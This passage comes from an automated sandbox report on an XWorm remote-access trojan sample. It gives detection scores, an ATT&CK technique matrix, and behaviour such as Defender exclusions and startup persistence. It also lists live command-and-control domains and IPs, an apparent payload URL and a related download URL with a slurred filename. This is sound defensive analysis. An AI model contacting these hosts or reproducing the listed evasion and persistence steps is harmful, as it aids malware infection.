              Source: Yara matchFile source: 00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 1c8DbXc5r0.exe PID: 6444, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 1c8DbXc5r0.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 1c8DbXc5r0.exe PID: 6444, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		2
              Registry Run Keys / Startup Folder              		11
              Process Injection              		1
              Masquerading              		1
              Input Capture              		221
              Security Software Discovery              		Remote Services1
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		1
              DLL Side-Loading              		2
              Registry Run Keys / Startup Folder              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging3
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527586 Sample: 1c8DbXc5r0.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 32 ser0xen.com 2->32 34 models-subscriptions.gl.at.ply.gg 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for dropped file 2->44 46 12 other signatures 2->46 8 1c8DbXc5r0.exe 14 6 2->8         started        signatures3 process4 dnsIp5 36 models-subscriptions.gl.at.ply.gg 147.185.221.18, 49738, 55624 SALSGIVERUS United States 8->36 38 ser0xen.com 18.224.107.108, 443, 49737 AMAZON-02US United States 8->38 30 C:\Users\user\AppData\Roaming\rapent.exe, PE32 8->30 dropped 48 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->48 50 Protects its processes via BreakOnTermination flag 8->50 52 Bypasses PowerShell execution policy 8->52 54 Adds a directory exclusion to Windows Defender 8->54 13 powershell.exe 23 8->13         started        16 powershell.exe 23 8->16         started        18 powershell.exe 23 8->18         started        20 powershell.exe 8->20         started        file6 signatures7 process8 signatures9 56 Loading BitLocker PowerShell Module 13->56 22 conhost.exe 13->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              1c8DbXc5r0.exe89%ReversingLabsByteCode-MSIL.Backdoor.XWorm
              1c8DbXc5r0.exe77%VirustotalBrowse
              1c8DbXc5r0.exe100%AviraTR/Spy.Gen
              1c8DbXc5r0.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\rapent.exe100%AviraTR/Spy.Gen
              C:\Users\user\AppData\Roaming\rapent.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\rapent.exe89%ReversingLabsByteCode-MSIL.Backdoor.XWorm
              C:\Users\user\AppData\Roaming\rapent.exe76%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              ser0xen.com2%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://ser0xen.com0%VirustotalBrowse
              https://ser0xen.com/pl.txt0%VirustotalBrowse
              http://www.microsoft.co1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ser0xen.com
              		18.224.107.108
              		truetrueunknown
              models-subscriptions.gl.at.ply.gg
              		147.185.221.18
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://ser0xen.com/pl.txttrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.microsopowershell.exe, 00000007.00000002.1982591730.000001355AF9A000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.microsoft.copowershell.exe, 00000004.00000002.1843415748.0000013EDD09E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://ser0xen.com1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmptrueunknown
                  http://crl.microspowershell.exe, 00000001.00000002.1758314462.0000024B31650000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    18.224.107.108
                    		ser0xen.comUnited States
                    		16509AMAZON-02UStrue
                    147.185.221.18
                    		models-subscriptions.gl.at.ply.ggUnited States
                    		12087SALSGIVERUStrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1527586
                    Start date and time:2024-10-07 04:49:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 13s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:14
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:1c8DbXc5r0.exe
                    renamed because original name is a hash value
                    Original Sample Name:49aa60a3ee7d3b03d16aa591024cbbc7.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@13/20@2/2
                    EGA Information:
                    • Successful, ratio: 20%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 42
                    • Number of non-executed functions: 5
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 2500 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2720 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6656 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7060 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    03:50:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnk
                    22:50:02API Interceptor51x Sleep call for process: powershell.exe modified
                    22:50:55API Interceptor231175x Sleep call for process: 1c8DbXc5r0.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    18.224.107.108http://ser0xen.com/sucklemydicknigger.exeGet hashmaliciousXWormBrowse
                    • ser0xen.com/sucklemydicknigger.exe
                    147.185.221.186Mt223MA25.exeGet hashmaliciousArrowRATBrowse
                      b34J4bxnmN.exeGet hashmaliciousNjratBrowse
                        01koiHnedL.exeGet hashmaliciousNjratBrowse
                          i231IEP3oh.exeGet hashmaliciousAsyncRATBrowse
                            killer.exeGet hashmaliciousXWormBrowse
                              system47.exeGet hashmaliciousXWormBrowse
                                javaupdate.jarGet hashmaliciousDynamic StealerBrowse
                                  javaupdate.jarGet hashmaliciousDynamic StealerBrowse
                                    LisectAVT_2403002C_149.exeGet hashmaliciousAsyncRATBrowse
                                      LisectAVT_2403002C_28.exeGet hashmaliciousRemcosBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ser0xen.comhttp://ser0xen.com/sucklemydicknigger.exeGet hashmaliciousXWormBrowse
                                        • 18.224.107.108

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        AMAZON-02UShttps://shorturl.at/5LwA8Get hashmaliciousUnknownBrowse
                                        • 54.180.170.69
                                        http://ser0xen.com/sucklemydicknigger.exeGet hashmaliciousXWormBrowse
                                        • 18.224.107.108
                                        https://maxask.comGet hashmaliciousUnknownBrowse
                                        • 54.246.173.101
                                        pur361ECCi.elfGet hashmaliciousMiraiBrowse
                                        • 63.32.132.7
                                        http://buddycities.com/Get hashmaliciousUnknownBrowse
                                        • 52.222.236.71
                                        http://buckboosters.com/Get hashmaliciousUnknownBrowse
                                        • 3.164.206.20
                                        https://wchckwl.org/Get hashmaliciousUnknownBrowse
                                        • 13.35.58.15
                                        https://event.stibee.com/v2/click/NDA4MDIvMjQzMzA0Ny80OTAyMzcv/aHR0cHM6Ly91cHBpdHkuY28ua3IvJWVhJWI3JWI4JWViJTgyJWEwLTUlZWIlYTclOGMtJWVjJTliJTkwJWViJThjJTgwLSVlYyU4MiViYyVlYyVhMCU4NCVlYyU5ZCU4NC0lZWIlYjQlYTQlZWMlOTYlYjQlZWMlOWElOTQtMi8Get hashmaliciousUnknownBrowse
                                        • 18.238.243.28
                                        http://vpnpanda.org/Get hashmaliciousUnknownBrowse
                                        • 52.222.236.94
                                        na.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
                                        • 34.249.145.219
                                        SALSGIVERUSPixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                        • 147.185.221.21
                                        H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                        • 147.185.221.23
                                        A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        • 147.185.221.23
                                        Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.22
                                        e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.22
                                        H1N45BQJ8x.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.23
                                        r4RF3TX5Mi.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.21
                                        BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.22
                                        ra66DSpa.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.21
                                        tMREqVW0.exeGet hashmaliciousXWormBrowse
                                        • 147.185.221.19

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eCamtech_Korea_Invoice_2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                        • 18.224.107.108
                                        e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                        • 18.224.107.108
                                        CI7IM149dR.exeGet hashmaliciousXWormBrowse
                                        • 18.224.107.108
                                        YirR3DbZQp.exeGet hashmaliciousXWormBrowse
                                        • 18.224.107.108
                                        qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                        • 18.224.107.108
                                        http://www.ngdhqw.blogspot.de/Get hashmaliciousGRQ ScamBrowse
                                        • 18.224.107.108
                                        http://milumuduli.github.io/netflix-templateGet hashmaliciousHTMLPhisherBrowse
                                        • 18.224.107.108
                                        http://hasnat22.github.io/Netflix-CloneGet hashmaliciousHTMLPhisherBrowse
                                        • 18.224.107.108
                                        http://hassan6077224.github.io/netflixclonetechtitansGet hashmaliciousHTMLPhisherBrowse
                                        • 18.224.107.108
                                        http://shreyascyber.github.io/Netflix-CloneGet hashmaliciousHTMLPhisherBrowse
                                        • 18.224.107.108

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Roaming\rapent.exehttp://ser0xen.com/sucklemydicknigger.exeGet hashmaliciousXWormBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:@...e...........................................................

                                          C:\Users\user\AppData\Local\Temp\Log.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):29
                                          Entropy (8bit):3.598349098128234
                                          Encrypted:false
                                          SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                          MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                          SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                          SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                          SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                          Malicious:false
                                          Preview:....### explorer ###..[WIN]r

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wp30kk5.0y3.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2galaucu.3lt.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2t2konqv.tmn.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wiocz3b.hdd.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wswhc2r.grd.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50h4jfnq.w1n.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bujyjel5.lcu.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fit4v0fq.0u3.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g51tgfm5.p4a.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
